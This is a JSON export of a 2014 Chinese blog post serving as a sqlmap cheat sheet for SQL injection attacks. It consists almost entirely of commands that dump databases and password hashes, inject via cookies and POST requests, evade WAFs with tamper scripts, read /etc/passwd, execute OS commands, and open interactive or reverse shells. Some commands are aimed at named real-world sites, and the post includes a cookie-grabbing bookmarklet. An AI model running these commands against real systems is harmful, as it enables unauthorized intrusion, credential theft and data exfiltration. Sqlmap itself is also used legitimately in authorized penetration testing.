{"id":106,"date":"2014-10-16T06:50:53","date_gmt":"2014-10-16T06:50:53","guid":{"rendered":""},"modified":"2014-10-16T06:50:53","modified_gmt":"2014-10-16T06:50:53","slug":"","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=106","title":{"rendered":"Sqlmap\u7b14\u8bb0"},"content":{"rendered":"<p>\n\t<span>1. \u57fa\u7840\u7528\u6cd5\uff1a<\/span>\n<\/p>\n<p>\n\t.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013dbs &nbsp;&nbsp;\/\/ \u5217\u4e3e\u6570\u636e\u5e93<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013current-db &nbsp;&nbsp;\/\/ \u5f53\u524d\u6570\u636e\u5e93<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013users &nbsp;&nbsp;&nbsp;\/\/ \u5217\u6570\u636e\u5e93\u7528\u6237<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013current-user &nbsp;\/\/ \u5f53\u524d\u7528\u6237<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013tables -D \u201c\u6570\u636e\u5e93\u201d &nbsp;&nbsp;\/\/ \u5217\u4e3e\u6570\u636e\u5e93\u7684\u8868\u540d<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013columns -T \u201c\u8868\u540d\u201d -D \u201c\u6570\u636e\u5e93\u201d &nbsp;&nbsp;\/\/ \u83b7\u53d6\u8868\u7684\u5217\u540d<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013dump -C \u201c\u5b57\u6bb5,\u5b57\u6bb5\u201d -T \u201c\u8868\u540d\u201d -D \u201c\u6570\u636e\u5e93\u201d &nbsp;&nbsp;\/\/ \u83b7\u53d6\u8868\u4e2d\u7684\u6570\u636e\uff0c\u5305\u542b\u5217\n<\/p>\n<p>\n\t\u5df2\u7ecf\u5f00\u59cb\u62d6\u5e93\u4e86\uff0cSQLMAP\u662f\u975e\u5e38\u4eba\u6027\u5316\u7684\uff0c\u5b83\u4f1a\u5c06\u83b7\u53d6\u7684\u6570\u636e\u5b58\u50a8sqlmap\/output\/\u4e2d\u3002\n<\/p>\n<p>\n\t\n<\/p>\n<p>\n\t<span>2. sqlmap post\u6ce8\u5165<\/span><br \/>\n<span>\u6211\u4eec\u5728\u4f7f\u7528Sqlmap\u8fdb\u884cpost\u578b\u6ce8\u5165\u65f6\uff0c<\/span><br \/>\n<span>\u7ecf\u5e38\u4f1a\u51fa\u73b0\u8bf7\u6c42\u9057\u6f0f\u5bfc\u81f4\u6ce8\u5165\u5931\u8d25\u7684\u60c5\u51b5\u3002<\/span><br \/>\n<span>\u8fd9\u91cc\u5206\u4eab\u4e00\u4e2a\u5c0f\u6280\u5de7\uff0c\u5373\u7ed3\u5408burpsuite\u6765\u4f7f\u7528sqlmap\uff0c<\/span><br \/>\n<span>\u7528\u8fd9\u79cd\u65b9\u6cd5\u8fdb\u884cpost\u6ce8\u5165\u6d4b\u8bd5\u4f1a\u66f4\u51c6\u786e\uff0c\u64cd\u4f5c\u8d77\u6765\u4e5f\u975e\u5e38\u5bb9\u6613\u3002<\/span><br \/>\n<span>1. \u6d4f\u89c8\u5668\u6253\u5f00\u76ee\u6807\u5730\u5740http:\/\/ www.2cto.com \/Login.asp<\/span><br \/>\n<span>2. \u914d\u7f6eburp\u4ee3\u7406(127.0.0.1:8080)\u4ee5\u62e6\u622a\u8bf7\u6c42<\/span><br \/>\n<span>3. \u70b9\u51fblogin\u8868\u5355\u7684submit\u6309\u94ae<\/span><br \/>\n<span>4. \u5982\u4e0b\u56fe\uff0c\u8fd9\u65f6\u5019Burp\u4f1a\u62e6\u622a\u5230\u4e86\u6211\u4eec\u7684\u767b\u5f55POST\u8bf7\u6c42<\/span><br \/>\n<span>5. \u628a\u8fd9\u4e2apost\u8bf7\u6c42\u590d\u5236\u4e3atxt, \u6211\u8fd9\u547d\u540d\u4e3asearch-test.txt \u7136\u540e\u628a\u5b83\u653e\u81f3sqlmap\u76ee\u5f55\u4e0b<\/span><span>6. \u8fd0\u884csqlmap\u5e76\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\uff1a<\/span>\n<\/p>\n<p>\n\t<span>.\/sqlmap.py -r search-test.txt -p tfUPass<\/span>\n<\/p>\n<p>\n\t<span><span>\u8fd9\u91cc\u53c2\u6570-r \u662f\u8ba9sqlmap\u52a0\u8f7d\u6211\u4eec\u7684post\u8bf7\u6c42rsearch-test.txt\uff0c<\/span><br \/>\n<span>\u800c-p \u5927\u5bb6\u5e94\u8be5\u6bd4\u8f83\u719f\u6089\uff0c\u6307\u5b9a\u6ce8\u5165\u7528\u7684\u53c2\u6570\u3002<\/span><br \/>\n<\/span>\n<\/p>\n<p>\n\t<span><span><br \/>\n<\/span><\/span>\n<\/p>\n<p>\n\t<span><span><\/span><\/span>\n<\/p>\n<p>\n\t3\uff0csqlmap &nbsp;cookies\u6ce8\u5165\n<\/p>\n<p>\n\tsqlmap.py -u \u201chttp:\/\/127.0.0.1\/base.php\u201d \u2013cookies \u201cid=1\u2033 &nbsp;\u2013dbs \u2013level 2\n<\/p>\n<p>\n\t<span><span><\/span><\/span>\n<\/p>\n<p>\n\t&nbsp;&nbsp;&nbsp;&nbsp;2. \u9ed8\u8ba4\u60c5\u51b5\u4e0bSQLMAP\u53ea\u652f\u6301GET\/POST\u53c2\u6570\u7684\u6ce8\u5165\u6d4b\u8bd5\uff0c\u4f46\u662f\u5f53\u4f7f\u7528\u2013level<br \/>\n\u53c2\u6570\u4e14\u6570\u503c&gt;=2\u7684\u65f6\u5019\u4e5f\u4f1a\u68c0\u67e5cookie\u65f6\u9762\u7684\u53c2\u6570\uff0c\u5f53&gt;=3\u7684\u65f6\u5019\u5c06\u68c0\u67e5User-agent\u548cReferer\uff0c\u90a3\u4e48\u8fd9\u5c31\u5f88\u7b80\u5355\u4e86\uff0c\u6211<br \/>\n \u4eec\u76f4\u63a5\u5728\u539f\u6709\u7684\u57fa\u7840\u4e0a\u9762\u52a0\u4e0a \u2013level 2 \u5373\u53ef\n<\/p>\n<p>\n\t\u5229\u7528sqlmap cookies\u6ce8\u5165\u7a81\u7834\u7528\u6237\u767b\u5f55\u7ee7\u7eed\u6ce8\u5165<br \/>\n\u5148\u628a\u7528\u6237\u767b\u9646\u7684cookie\u62ff\u5230\u5427\uff0c<br \/>\n\u5728\u6536\u85cf\u5939\u6dfb\u52a0\u4e00\u4e2a\u94fe\u63a5cookies\u5c5e\u6027\uff1a<br \/>\n\u540d\u5b57\u81ea\u5df1\u53d6<br \/>\njavascript:alert(document.cookie)\uff0c\uff0c\u9700\u8981\u83b7\u53d6\u5f53\u524dcookie\u7684\u65f6\u5019\uff0c<br \/>\n\u76f4\u63a5\u70b9\u4e00\u4e0b\u8fd9\u4e2a\u94fe\u63a5\uff0c\u7136\u540e\u590d\u5236\u4e00\u4e0b\u5f39\u51fa\u5bf9\u8bdd\u6846<br \/>\n\u91cc\u7684cookie\u503c\u5c31\u641e\u5b9a\u4e86\n<\/p>\n<p>\n\tsqlmap.py -u http:\/\/x.x.x.x\/Down.aspx?tid=2 -p tid \u2013dbms mssql \u2013cookie=\u201dinfo=username=test\u201d\n<\/p>\n<p>\n\t-p\u662f\u6307\u6307\u5b9a\u53c2\u6570\u6ce8\u5165\n<\/p>\n<p>\n\t<span><span><br \/>\n<\/span><\/span>\n<\/p>\n<p>\n\t<span><span><br \/>\n<\/span><\/span>\n<\/p>\n<p>\n\t<span><span><\/span><\/span>\n<\/p>\n<p>\n\t4. sqlmap\u9047\u5230url\u91cd\u5199\u7684\u6ce8\u5165\n<\/p>\n<p>\n\t\u54ea\u91cc\u5b58\u5728\u6ce8\u5165\u5c31\u52a0\u4e0a * \u53f7<br \/>\n1<br \/>\n.\/sqlmap.py -u \u201chttp:\/\/www.cunlide.com\/id1\/1*\/id2\/2\u201c\n<\/p>\n<p>\n\t<span><span><br \/>\n<\/span><\/span>\n<\/p>\n<p>\n\t<span><span><br \/>\n<\/span><\/span>\n<\/p>\n<p>\n\t<span><span><\/span><\/span>\n<\/p>\n<p>\n\t5.sqlmap \u7f16\u7801\u7ed5waf\u6ce8\u5165\n<\/p>\n<p>\n\t.\/sqlmap.py -u http:\/\/127.0.0.1\/test.php?id=1 -v 3 \u2013dbms \u201cMySQL\u201d \u2013technique U -p id \u2013batch \u2013tamper \u201cspace2morehash.py\u201d\n<\/p>\n<p>\n\t\u5728sqlmap \u7684 tamper\u76ee\u5f55\u4e0b\u6709\u5f88\u591aspace2morehash.py \u7f16\u7801\u811a\u672c\u81ea\u884c\u52a0\u8f7d\n<\/p>\n<p>\n\t\n<\/p>\n<p>\n\t\n<\/p>\n<p>\n\t\u5176\u4ed6\u57fa\u7840\uff1a<br \/>\nsqlmap -u \u201chttp:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms \u201cMysql\u201d \u2013current-user #\u83b7\u53d6\u5f53\u524d\u7528\u6237\u540d\u79f0\n<\/p>\n<p>\n\tsqlmap -u \u201chttp:\/\/www.xxoo.com\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms \u201cMysql\u201d \u2013current-db &nbsp;#\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u540d\u79f0\n<\/p>\n<p>\n\tsqlmap -u \u201chttp:\/\/www.xxoo.com\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms \u201cMysql\u201d\u2013tables &nbsp;-D \u201cdb_name\u201d #\u5217\u8868\u540d\n<\/p>\n<p>\n\tsqlmap -u \u201chttp:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart &nbsp;\u2013dbms \u201cMysql\u201d \u2013columns -T \u201ctablename\u201d users-D \u201cdb_name\u201d -v 0 #\u5217\u5b57\u6bb5\n<\/p>\n<p>\n\tsqlmap -u \u201chttp:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart \u2013dbms \u201cMysql\u201d &nbsp;\u2013dump<br \/>\n &nbsp;-C \u201ccolumn_name\u201d &nbsp;-T \u201ctable_name\u201d -D \u201cdb_name\u201d -v 0 &nbsp;&nbsp;#\u83b7\u53d6\u5b57\u6bb5\u5185\u5bb9\n<\/p>\n<p>\n\t\n<\/p>\n<p>\n\t******************\u4fe1\u606f\u83b7\u53d6******************\n<\/p>\n<p>\n\tsqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d \u2013users &nbsp;#\u5217\u6570\u636e\u5e93\u7528\u6237 &nbsp;sqlmap -u \u201c \u2013smart<br \/>\n\u2013dbms \u201cMysql\u201d \u2013dbs#\u5217\u6570\u636e\u5e93 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013passwords<br \/>\n#\u6570\u636e\u5e93\u7528\u6237\u5bc6\u7801 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013passwords-U root &nbsp;-v 0<br \/>\n#\u5217\u51fa\u6307\u5b9a\u7528\u6237\u6570\u636e\u5e93\u5bc6\u7801 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d \u2013dump-all -v 0<br \/>\n#\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\u6240\u6709\u8868 &nbsp;&nbsp;<br \/>\nsqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013privileges #\u67e5\u770b\u6743\u9650<br \/>\n&nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013privileges -U root #\u67e5\u770b\u6307\u5b9a\u7528\u6237\u6743\u9650 &nbsp;sqlmap<br \/>\n-u \u201c \u2013smart \u2013dbms \u201cMysql\u201d \u2013is-dba -v 1 #\u662f\u5426\u662f\u6570\u636e\u5e93\u7ba1\u7406\u5458 &nbsp;sqlmap -u \u201c \u2013smart<br \/>\n\u2013dbms \u201cMysql\u201d \u2013roles #\u679a\u4e3e\u6570\u636e\u5e93\u7528\u6237\u89d2\u8272 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms<br \/>\n\u201cMysql\u201d\u2013udf-inject #\u5bfc\u5165\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\uff08\u83b7\u53d6\u7cfb\u7edf\u6743\u9650\uff01\uff09 &nbsp;<br \/>\nsqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013dump-all \u2013exclude-sysdbs -v 0 #\u5217\u51fa\u5f53\u524d\u5e93\u6240\u6709\u8868 &nbsp;<br \/>\nsqlmap<br \/>\n -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d \u2013union-check #\u662f\u5426\u652f\u6301union \u6ce8\u5165 &nbsp;sqlmap -u \u201c<br \/>\n\u2013smart \u2013dbms \u201cMysql\u201d\u2013union-cols #union \u67e5\u8be2\u8868\u8bb0\u5f55 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms<br \/>\n\u201cMysql\u201d \u2013union-test #union \u8bed\u53e5\u6d4b\u8bd5 &nbsp;<br \/>\nsqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d<br \/>\n\u2013union-use \u2013banner #\u91c7\u7528union \u6ce8\u5165 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms<br \/>\n\u201cMysql\u201d\u2013union-test \u2013union-tech orderby #union \u914d\u5408 order by &nbsp;<br \/>\nsqlmap -u<br \/>\n \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013method \u201cPOST\u201d \u2014 data \u201cid=1&amp;cat=2\u2033 #post\u6ce8\u5165<br \/>\n&nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013cookie \u201cCOOKIE_VALUE\u201d #cookie\u6ce8\u5165 &nbsp;<br \/>\nsqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d-b #\u83b7\u53d6banner\u4fe1\u606f\n<\/p>\n<p>\n\t\n<\/p>\n<p>\n\tsqlmap -u \u201chttp:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart-v 1 -f #\u6307\u7eb9\u5224\u522b\u6570\u636e\u5e93\u7c7b\u578b\n<\/p>\n<p>\n\tsqlmap -u \u201chttp:\/\/url\/news?id=1\u201d \u2013level=3 \u2013smart\u2013proxy\u201dhttp:\/\/127.0.0.1:8118\u201d #\u4ee3\u7406\u6ce8\u5165\n<\/p>\n<p>\n\t<span>sqlmap -u \u201chttp:\/\/url\/news?id=1\u2033\u2013string\u201dSTRING_ON_TRUE_PAGE\u201c &nbsp;#\u6307\u5b9a\u5173\u952e\u8bcd<\/span>\n<\/p>\n<p>\n\t<span><br \/>\n<\/span>\n<\/p>\n<p>\n\t<span><br \/>\n<\/span>\n<\/p>\n<p><span><span><span>sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013sql-shell #\u6267\u884c\u6307\u5b9asql\u547d\u4ee4 &nbsp;<\/span><br \/>\n<span>sqlmap<br \/>\n -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013file \/etc\/passwd &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms<br \/>\n\u201cMysql\u201d\u2013os-cmd=whoami #\u6267\u884c\u7cfb\u7edf\u547d\u4ee4 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013os-shell<br \/>\n #\u7cfb\u7edf\u4ea4\u4e92shell &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013os-pwn #\u53cd\u5f39shell &nbsp;sqlmap -u<br \/>\n \u201c \u2013smart \u2013dbms \u201cMysql\u201d\u2013reg-read #\u8bfb\u53d6win\u7cfb\u7edf\u6ce8\u518c\u8868 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms<br \/>\n\u201cMysql\u201d \u2013dbs-o \u201csqlmap.log\u201d #\u4fdd\u5b58\u8fdb\u5ea6 &nbsp;sqlmap -u \u201c \u2013smart \u2013dbms \u201cMysql\u201d \u2013dbs<br \/>\n &nbsp;-o \u201csqlmap.log\u201d \u2013resume &nbsp;#\u6062\u590d\u5df2\u4fdd\u5b58\u8fdb\u5ea6 <\/span><\/span><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span>1. \u57fa\u7840\u7528\u6cd5\uff1a<\/span><\/p>\n<p>\n\t.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013dbs &nbsp;&nbsp;\/\/ \u5217\u4e3e\u6570\u636e\u5e93<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013current-db &nbsp;&nbsp;\/\/ \u5f53\u524d\u6570\u636e\u5e93<br \/>\n.\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013users &nbsp;&nbsp;&nbsp;\/\/ \u5217\u6570\u636e\u5e93\u7528\u6237<br \/>\n.\/sqlmap.py -u &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[],"class_list":["post-106","post","type-post","status-publish","format-standard","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Sqlmap\u7b14\u8bb0 - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=106\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sqlmap\u7b14\u8bb0 - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"1. \u57fa\u7840\u7528\u6cd5\uff1a .\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013dbs &nbsp;&nbsp;\/\/ \u5217\u4e3e\u6570\u636e\u5e93 .\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013current-db &nbsp;&nbsp;\/\/ \u5f53\u524d\u6570\u636e\u5e93 .\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013users &nbsp;&nbsp;&nbsp;\/\/ \u5217\u6570\u636e\u5e93\u7528\u6237 .\/sqlmap.py -u ...\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=106\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2014-10-16T06:50:53+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=106#webpage\",\"url\":\"http:\/\/weizn.net\/?p=106\",\"name\":\"Sqlmap\\u7b14\\u8bb0 - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"datePublished\":\"2014-10-16T06:50:53+00:00\",\"dateModified\":\"2014-10-16T06:50:53+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=106#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=106\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=106#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sqlmap\\u7b14\\u8bb0\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=106#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=106#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"Sqlmap\\u7b14\\u8bb0\",\"datePublished\":\"2014-10-16T06:50:53+00:00\",\"dateModified\":\"2014-10-16T06:50:53+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=106#webpage\"},\"wordCount\":541,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"articleSection\":[\"\\u5e94\\u7528\\u5b89\\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=106#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sqlmap\u7b14\u8bb0 - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=106","og_locale":"zh_CN","og_type":"article","og_title":"Sqlmap\u7b14\u8bb0 - Wayne&#039;s Blog","og_description":"1. \u57fa\u7840\u7528\u6cd5\uff1a .\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013dbs &nbsp;&nbsp;\/\/ \u5217\u4e3e\u6570\u636e\u5e93 .\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013current-db &nbsp;&nbsp;\/\/ \u5f53\u524d\u6570\u636e\u5e93 .\/sqlmap.py -u \u201c\u6ce8\u5165\u5730\u5740\u201d -v 1 \u2013users &nbsp;&nbsp;&nbsp;\/\/ \u5217\u6570\u636e\u5e93\u7528\u6237 .\/sqlmap.py -u ...","og_url":"http:\/\/weizn.net\/?p=106","og_site_name":"Wayne&#039;s Blog","article_published_time":"2014-10-16T06:50:53+00:00","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"3 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=106#webpage","url":"http:\/\/weizn.net\/?p=106","name":"Sqlmap\u7b14\u8bb0 - Wayne&#039;s Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"datePublished":"2014-10-16T06:50:53+00:00","dateModified":"2014-10-16T06:50:53+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=106#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=106"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=106#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"Sqlmap\u7b14\u8bb0"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=106#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=106#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"Sqlmap\u7b14\u8bb0","datePublished":"2014-10-16T06:50:53+00:00","dateModified":"2014-10-16T06:50:53+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=106#webpage"},"wordCount":541,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"articleSection":["\u5e94\u7528\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=106#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=106"}],"version-history":[{"count":0,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/106\/revisions"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=106"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}